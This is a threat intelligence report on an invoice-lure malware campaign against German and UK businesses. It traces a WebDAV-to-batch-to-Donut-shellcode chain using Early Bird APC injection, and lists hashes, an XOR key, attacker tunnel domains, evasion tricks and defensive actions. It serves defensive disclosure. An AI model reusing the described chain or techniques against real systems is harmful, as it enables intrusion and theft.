Operation Charger Van — Breakglass Intelligence Report

TLP: WHITE Date: 2026-04-05 Analyst: GHOST (Breakglass Intelligence) Classification: Cybercrime — Initial Access Broker / RAT Deployment Related: Operation Nutten Tunnel, Operation Crest Snake, Operation Klein Changes

Executive Summary

Investigation of the charger-van-feb-circuit Cloudflare Quick Tunnel reveals the fourth documented tunnel rotation by a persistent threat actor targeting German and UK businesses with invoice-themed lures. The tunnel serves a WsgiDAV 4.3.3 open directory containing a complete attack chain: WSH entry point -> JScript WebDAV loader -> batch downloader -> XOR-encrypted Donut shellcode with Early Bird APC injection. This investigation also uncovered a previously undocumented staging tunnel (highland-trend-src-distinct) hosting the full payload archive dating back to November 2025, making this the oldest known artifact from this actor. The actor has 7 confirmed active tunnels as of April 5, 2026. All samples have zero detections on VirusTotal and no prior public reporting.

Critical OPSEC failures identified: the persistence script (pol.bat) references a directory from a previous tunnel (lg07) while the installer creates a different directory (vours), causing the persistence mechanism to silently fail. Additionally, the batch downloader references payload files (tv.bin, t.json) that were never uploaded to the tunnel.

Key Findings

• 7 LIVE Cloudflare Quick Tunnels confirmed active (charger-van, chubby-resident, highland-trend, klein-changes, crest-ind, wet-envelope, requires-fortune)
• Same actor confirmed: Identical TTPs (WsgiDAV, oa.wsh/ccv.js chain, PurePythonObfuscator, KISS Loader, Early Bird APC injection)
• New staging tunnel discovered: highland-trend-src-distinct hosts payload archive dating to November 28, 2025 (Sep01x86_Ayoo.zip)
• Donut-packed shellcode: 71,938-byte XOR-encrypted payload containing Donut loader with embedded PE (MZ at offset 0x2495)
• Persistence BROKEN: pol.bat references %LOCALAPPDATA%\lg07 but installer creates %LOCALAPPDATA%\vours — persistence silently fails
• Missing payloads: neli.bat references tv.bin and t.json which return HTTP 404 — only ov.bin/a.json were deployed
• German targeting: Lure document is IHK (German Chamber of Commerce) small business invoice template
• Zero VT detections: Neither so.py nor vwo.zip appear in VirusTotal
• Tactical evolution: Actor shifting from native DLL (Early Bird via jopfgl.dll/emand.dll) to Python-only chain (KISS Loader)

What Was Found vs. What Was Known

Aspect	Prior Reporting (3 investigations)	Our Findings (this investigation)
Active tunnels	5 (requires-fortune, crest-ind, klein-changes, wet-envelope, chubby-resident)	7 (+charger-van, +highland-trend)
Oldest artifact	Jan 14, 2026 (klein-changes WSF)	Nov 28, 2025 (Sep01x86_Ayoo.zip on highland-trend)
WsgiDAV versions	4.3.0, 4.3.3	Confirmed mixed: 4.3.0 (highland-trend, chubby-resident), 4.3.3 (charger-van)
Payload type	Python RATs + Early Bird DLL	Donut-packed shellcode (new variant) via KISS Loader
Encryption	XOR with PurePythonObfuscator keys	Same (32-byte XOR, JSON key files, base64-encoded)
OPSEC failures	SID leak, LNK metadata	Broken persistence (wrong directory), missing payloads (tv.bin/t.json), reused scripts across tunnels
Execution variants	Python-only vs DLL+Python	4 named variants: Winic (32-bit), DCMv, Callup, sharex (64-bit)

Attack Chain

[1] Victim receives link to tunnel
    |
[2] oa.wsh (WebDAV) -> loads ccv.js from \\charger-van...@SSL\DavWWWRoot\
    |
[3] ccv.js (JScript ActiveXObject) -> copies neli.bat to %TEMP%\r.bat, executes hidden
    |
[4] neli.bat opens IHK invoice PDF lure (ihk.de)
    |-- Downloads pol.bat to Startup (PERSISTENCE - BROKEN: references lg07, not vours)
    |-- Downloads vwo.zip, extracts to %LOCALAPPDATA%\vours
    |-- Downloads Python 3.10.0 embed to same directory
    |
[5] so.py (KISS Loader) decrypts ov.bin using XOR key from a.json
    |
[6] Donut shellcode (71,938 bytes) loaded via Early Bird APC injection into explorer.exe
    |
[7] Donut decrypts embedded PE module and executes in-memory

Alternate Chain (via chubby-resident + highland-trend tunnels)

[1] UKA0X1.txt (downloader) fetches from highland-trend tunnel:
    |-- 1Mar23MA.zip (16.7 MB) -> %USERPROFILE%\Contacts\MainRingtones (Python 3.12 x64 + payloads)
    |-- 1Mar23ST.zip (16.7 MB) -> %USERPROFILE%\Contacts\str
    |-- 1MaDLL.zip (357 KB) -> %APPDATA%\TokenSys (emand.dll - Early Bird DLL)
    |-- 1Mar23SU.txt -> Startup persistence
    |
[2] UKA0X2.txt (executor):
    |-- Runs all .py files in MainRingtones\python312x64\
    |-- Loads emand.dll via regsvr32 /s (DLL variant only)
    |-- Kills Python parent processes via WMI
    |-- Hides extracted folders with attrib +h
    |-- Self-cleanup: deletes all .bat in Contacts, removes staging folders

Infrastructure Analysis

Tunnel Inventory (as of 2026-04-05)

Tunnel Name	WsgiDAV	Role	Status	First Seen	Investigation
charger-van-feb-circuit	4.3.3	Lure + payload delivery	LIVE	2026-03-31	This investigation
chubby-resident-airlines-converter	4.3.0	Batch script hosting (UK chain)	LIVE	2026-04-01	This investigation
highland-trend-src-distinct	4.3.0	Payload staging (zips, DLLs)	LIVE	2025-11-28	This investigation (NEW)
klein-changes-slim-starter	4.3.0	WSF dropper hosting	LIVE	2026-01-14	Op. Klein Changes
crest-ind-snake-dublin	4.3.0	Lure WSH hosting	LIVE	2026-04-02	Op. Crest Snake
wet-envelope-beam-laser	Unknown	Payload staging	LIVE	Unknown	Op. Crest Snake
requires-fortune-nutten-eligible	4.3.3	German lure campaign	LIVE	2026-03-23	Op. Nutten Tunnel

Highland-Trend Tunnel Contents (Payload Archive)

File	Size	Date	Purpose
Sep01x86_Ayoo.zip	10.6 MB	2025-11-28	Oldest artifact — x86 payload from Sep/Nov 2025
1MaDLL.zip	357 KB	2026-03-30	Early Bird APC injection DLL (emand.dll/jopfgl.dll)
1Mar23MA.zip	16.7 MB	2026-04-02	Main payload — Python 3.12 x64 + RAT scripts
1Mar23ST.zip	16.7 MB	2026-04-02	Backup/streaming payload
1Mar23SU.bat	1.9 KB	2025-12-15	Old startup persistence (Dec 2025 version)
1Mar23SU.txt	2.8 KB	2026-03-27	Current startup persistence (Mar 2026 version)

Chubby-Resident Tunnel Contents

File	Date	DLL Variant?	Description
UKA011.txt	2026-04-01	YES	Stage 1 downloader — downloads MA + ST + DLL zips
UKA012.txt	2026-04-01	YES	Stage 2 executor — runs Python + regsvr32 DLL + cleanup
UKA021.txt	2026-04-02	NO	Stage 1 downloader — Python-only (no DLL zip)
UKA022.txt	2026-04-02	NO	Stage 2 executor — Python-only (no regsvr32)

Disguise Directory Names

Folder Path	Disguised As
%USERPROFILE%\Contacts\MainRingtones	Ringtone files
%USERPROFILE%\Contacts\str	Generic
%APPDATA%\TokenSys	Token management system
%APPDATA%\Winic	Winic software
%USERPROFILE%\Videos\3DAus	3D output files
%LOCALAPPDATA%\vours	Generic (charger-van)
%LOCALAPPDATA%\lg07	Generic (previous tunnel)

Malware Analysis

Charger-Van Primary Payload

File: vwo.zip -> ov.bin + a.json + so.py

Property	Value
vwo.zip SHA256	ab1ac7b16251a98bf0ca4a8df0c78de21b395ddd0a81aa273dd0fd40a3af7f03
so.py SHA256	5cab6bf65f7836371d5c27fbfc20fe10c0c4a11784990ed1a3d2585fa5431ba6
ov.bin SHA256	97b7c807c35e06f2fbc4723844b4dc99188de3c0e920d7b77fffce5f3d9a88db
a.json SHA256	ff5a9c8bad4d0afa5fba68a08cf91dbda0619c06a143dcd0aeb5c2c5dccd0274
Decrypted shellcode SHA256	43caced9aa891ec593e4d3f09e9858c5d63ba4f23584e86b6673146e75181045
Encryption	XOR with 32-byte key from PurePythonObfuscator
XOR Key (hex)	d38b4e224197e1758b2d7e9453e332db112bbfd1be51ef01f28d874ed2b90a48
Shellcode size	71,938 bytes
Packer	Donut loader (call +0xBB88, pop rcx, structure-based API resolution)
Injection technique	Early Bird APC (T1055.004)
Target process	explorer.exe (default)
Embedded PE	MZ header at offset 0x2495 within Donut instance (encrypted)
VT Detections	0/0 (not submitted)

Encryption Details

Key generator: PurePythonObfuscator v1.0
Entropy source: secrets+urandom+time+pid
Random seed: jNlLbmwnGkqiY2+XkmvHeQ==
XOR key (base64): 04tOIkGX4XWLLX6UU+My2xErv9G+Ue8B8o2HTtK5Ckg=
Integrity SHA256: a3437b0605513413d6803f832d416a691a92ed970b3f5a76b93693b33465bbcf

so.py (KISS Loader) Analysis

The loader is labeled "KISS Loader - Early Bird APC Injection for Lab Testing" and implements:

1. XOR decryption using key from JSON file
2. Early Bird APC injection via:
   • CreateProcessW (suspended, no window)
   • VirtualAllocEx (RWX)
   • WriteProcessMemory
   • QueueUserAPC
   • ResumeThread
3. Basic shellcode validation (checks first bytes for Meterpreter/x64/x86 patterns)
4. System info collection (OS, arch, username, computername)

Donut Shellcode Structure

Offset 0x0000: e8 88 bb 00 00          call +0xBB88 (jump to code)
Offset 0x0005: [48008 bytes]           Donut instance (encrypted PE module)
  - 0x0000: Instance length (0xBB88)
  - 0x0004: CHASKEY key (32 bytes)
  - 0x0024: IV/nonce (8 bytes)
  - 0x2495: Encrypted PE (MZ header visible after Donut decryption)
Offset 0xBB8D: [23925 bytes]           Donut loader code
  - pop rcx (get instance pointer)
  - API hash resolution
  - VirtualAlloc (MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE)
  - Instance decryption
  - PE loading and execution

Dropper Chain Files

File	SHA256	Purpose
oa.wsh	94fe098ad878291c43bd3515da6dca27ead39377f524152d357bb004e0cdb723	WebDAV script host launcher
ccv.js	ccb47e0a1f0e55a35ba1d554070d3524a45dfa5b86ca36cd5fb7d05dbdd144ca	JScript WebDAV copier + executor
neli.bat	c37ccf440732aa346ea7541b80a3799bff4437e052023bacde50cef1c89801c2	Main batch downloader (opens lure, downloads payloads)
pol.bat	f84763ec289fc0389b0dd1b240bbaa8a231b54ad0decc1b66b0eb07e5c7a70e2	Startup persistence (BROKEN - wrong directory)
desktop.ini	8301e344371b0753d547b429c5fe513908b1c9813144f08549563ac7f4d7da68	Windows folder descriptor (UTF-16)

Highland-Trend DLL Payload

Property	Value
1MaDLL.zip SHA256	314c2cb202e4cea8d63051325abe326dfb75ae2995e843f6e8eea247290f59a1
Contents	emand.dll (Early Bird APC injection DLL)
Loading	regsvr32 /s (silent COM registration)
Previously documented	jopfgl.dll in Op. Klein Changes (GCC 15.1.0 compiled)

Threat Actor Profile

Attribution Assessment

• Confidence: HIGH (cross-investigation consistency)
• SID: S-1-5-21-3343087317-1842942590-547433828-500 (Administrator, confirmed across all campaigns)
• Country/Region: Likely German-speaking or targeting German speakers
• Motivation: Financial (Initial Access Broker / RAT deployment)
• Sophistication: MODERATE (custom tooling, multi-tunnel architecture, but frequent OPSEC failures)

OPSEC Failures (This Investigation)

1. Broken persistence: pol.bat references %LOCALAPPDATA%\lg07 (from previous tunnel), but neli.bat creates %LOCALAPPDATA%\vours. Persistence will silently fail on reboot.
2. Missing payloads: neli.bat attempts to decrypt tv.bin with t.json, but neither file exists on the tunnel (HTTP 404). Only ov.bin/a.json were deployed.
3. Reused scripts: pol.bat is a direct copy from a previous tunnel without updating the directory path.
4. Left old artifacts online: highland-trend tunnel still hosts Sep01x86_Ayoo.zip from November 2025 and 1Mar23SU.bat from December 2025.
5. All tunnels remain active: Despite being investigated 3 times, all 7 tunnels are still live and accessible.
6. Anonymous read-write access: All WsgiDAV instances allow unauthenticated read-write access.

Actor Timeline

Date	Event	Tunnel	Evidence
2025-11-28	Sep01x86_Ayoo.zip uploaded	highland-trend	File timestamp
2025-12-15	1Mar23SU.bat (old startup) created	highland-trend	File timestamp
2026-01-14	First WSF dropper	klein-changes	Investigation
2026-03-23	German lure campaign	requires-fortune	Investigation
2026-03-27	Startup persistence updated (.txt variant)	highland-trend	File timestamp
2026-03-30	1MaDLL.zip (Early Bird DLL) uploaded	highland-trend	File timestamp
2026-03-31	desktop.ini placed	charger-van	File timestamp
2026-04-01	UKA011/012 (DLL variant) deployed	chubby-resident	File timestamp
2026-04-02	UKA021/022 (Python-only variant) deployed	chubby-resident	File timestamp
2026-04-02	Main payload zips updated	highland-trend	File timestamp
2026-04-02	Lure hosting active	crest-ind	Investigation
2026-04-03	ccv.js, neli.bat, oa.wsh uploaded	charger-van	File timestamp
2026-04-05	ALL 7 tunnels confirmed LIVE	All	This investigation

Tactical Evolution

The actor demonstrates clear evolution across the investigation timeline:

1. Sep-Nov 2025: x86-only payloads (Sep01x86_Ayoo.zip)
2. Dec 2025: Added 32-bit/64-bit dual architecture (1Mar23SU.bat)
3. Jan-Mar 2026: WSF dropper chain, multiple RAT variants
4. Late Mar 2026: Added native DLL injection (1MaDLL.zip/emand.dll via regsvr32)
5. Apr 1, 2026: DLL + Python dual-payload chain (UKA011/012)
6. Apr 2, 2026: Removed DLL, Python-only chain (UKA021/022) — possible detection avoidance
7. Apr 3, 2026: New tunnel (charger-van) with Donut-packed shellcode via KISS Loader — significant capability upgrade

The shift from Python RAT scripts to Donut-packed shellcode with Early Bird APC injection represents a notable escalation in sophistication.

MITRE ATT&CK Mapping

Tactic	Technique	ID	Application
Initial Access	Phishing: Spearphishing Link	T1566.002	Link to WsgiDAV tunnel
Execution	User Execution: Malicious File	T1204.002	oa.wsh -> ccv.js chain
Execution	Command and Scripting: JScript	T1059.007	ccv.js ActiveXObject
Execution	Command and Scripting: Windows Command Shell	T1059.003	neli.bat, pol.bat
Execution	Command and Scripting: Python	T1059.006	so.py KISS Loader, RAT scripts
Execution	System Services: Service Execution	T1569.002	regsvr32 /s emand.dll
Persistence	Boot or Logon Autostart: Startup Folder	T1547.001	pol.bat in Startup folder
Defense Evasion	Process Injection: Early Bird APC	T1055.004	QueueUserAPC into explorer.exe
Defense Evasion	Obfuscated Files: Encrypted/Encoded File	T1027.013	XOR-encrypted .bin payloads
Defense Evasion	Deobfuscate/Decode Files	T1140	XOR decryption at runtime
Defense Evasion	Masquerading: Match Legitimate Name	T1036.005	Folders named MainRingtones, TokenSys, Winic
Defense Evasion	Hide Artifacts: Hidden Files	T1564.001	attrib +h on payload directories
Defense Evasion	Signed Binary Proxy Execution: Regsvr32	T1218.010	regsvr32 /s for DLL loading
Lateral Movement	Remote Services: SMB/WebDAV	T1021.002	WebDAV file access via UNC paths

IOC Summary

Network Indicators

• charger-van-feb-circuit[.]trycloudflare[.]com — WsgiDAV 4.3.3 — Lure + payload delivery — LIVE
• chubby-resident-airlines-converter[.]trycloudflare[.]com — WsgiDAV 4.3.0 — Batch hosting — LIVE
• highland-trend-src-distinct[.]trycloudflare[.]com — WsgiDAV 4.3.0 — Payload staging — LIVE
• klein-changes-slim-starter[.]trycloudflare[.]com — WSF dropper hosting — LIVE
• crest-ind-snake-dublin[.]trycloudflare[.]com — Lure WSH hosting — LIVE
• wet-envelope-beam-laser[.]trycloudflare[.]com — Payload staging — LIVE
• requires-fortune-nutten-eligible[.]trycloudflare[.]com — German lure campaign — LIVE
• hxxps://www[.]ihk[.]de/blueprint/servlet/resource/blob/5581278/1cafa7f203df9d83e050d9f01677ffe6/rechnung-kleinunternehmer-data[.]pdf — Lure document (legitimate IHK invoice template)

File Indicators

SHA256	Filename	Type
ab1ac7b16251a98bf0ca4a8df0c78de21b395ddd0a81aa273dd0fd40a3af7f03	vwo.zip	Payload archive
5cab6bf65f7836371d5c27fbfc20fe10c0c4a11784990ed1a3d2585fa5431ba6	so.py	KISS Loader (Early Bird APC)
97b7c807c35e06f2fbc4723844b4dc99188de3c0e920d7b77fffce5f3d9a88db	ov.bin	XOR-encrypted Donut shellcode
ff5a9c8bad4d0afa5fba68a08cf91dbda0619c06a143dcd0aeb5c2c5dccd0274	a.json	PurePythonObfuscator XOR key
43caced9aa891ec593e4d3f09e9858c5d63ba4f23584e86b6673146e75181045	ov_decrypted.bin	Decrypted Donut shellcode
ccb47e0a1f0e55a35ba1d554070d3524a45dfa5b86ca36cd5fb7d05dbdd144ca	ccv.js	JScript WebDAV copier
c37ccf440732aa346ea7541b80a3799bff4437e052023bacde50cef1c89801c2	neli.bat	Main downloader batch
94fe098ad878291c43bd3515da6dca27ead39377f524152d357bb004e0cdb723	oa.wsh	WSH entry point
f84763ec289fc0389b0dd1b240bbaa8a231b54ad0decc1b66b0eb07e5c7a70e2	pol.bat	Persistence (broken)
314c2cb202e4cea8d63051325abe326dfb75ae2995e843f6e8eea247290f59a1	1MaDLL.zip	Early Bird DLL archive

Behavioral Indicators

• Startup persistence: Random-named .bat in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
• Working directories: %LOCALAPPDATA%\vours, %LOCALAPPDATA%\lg07, %USERPROFILE%\Contacts\MainRingtones, %APPDATA%\TokenSys, %APPDATA%\Winic
• Python embed download: hxxps://www[.]python[.]org/ftp/python/3.10.0/python-3.10.0-embed-amd64.zip
• Hidden folders: attrib +h applied to payload directories
• VBS helpers: rhn.vbs, rhnE.vbs, DiscordDial.vbs, py_parent.vbs in %USERPROFILE%\Contacts\
• Process pattern: python.exe spawned as parent of explorer.exe (killed via WMI after payload execution)

Recommended Actions

Immediate (24-48 hours)

• Block all 7 tunnel domains at DNS/proxy level
• Search for so.py, ov.bin, a.json file names in %LOCALAPPDATA% and %USERPROFILE%\Contacts
• Check Startup folder for random-named .bat files containing so.py or python references
• Look for python.exe running from non-standard paths (Contacts, Videos, AppData)

Short-term (1-2 weeks)

• Submit IOCs to MalwareBazaar, ThreatFox, URLhaus
• Report tunnels to Cloudflare abuse (abuse@cloudflare.com) — all 7 tunnels
• Hunt for additional tunnel rotations (actor creates new tunnels frequently)
• Deploy YARA rules for KISS Loader and PurePythonObfuscator key files

Medium-term (1-3 months)

• Monitor trycloudflare.com CT logs for new WsgiDAV instances
• Track PurePythonObfuscator tooling for new variants
• Cross-reference Donut shellcode hashes with sandbox submissions

References

• [Op. Nutten Tunnel] /home/ghost/investigations/trycloudflare-wsgidev/README.md
• [Op. Crest Snake] /home/ghost/investigations/trycloudflare-crest-ind/README.md
• [Op. Klein Changes] /home/ghost/investigations/trycloudflare-klein-changes/README.md
• [Donut Loader] https://github.com/TheWover/donut
• [Early Bird APC Injection] https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/
• [WsgiDAV] https://github.com/mar10/wsgidav
• [IHK Lure] German Chamber of Commerce invoice template (legitimate document used as decoy)

---

GHOST — Breakglass Intelligence "One indicator. Total infrastructure."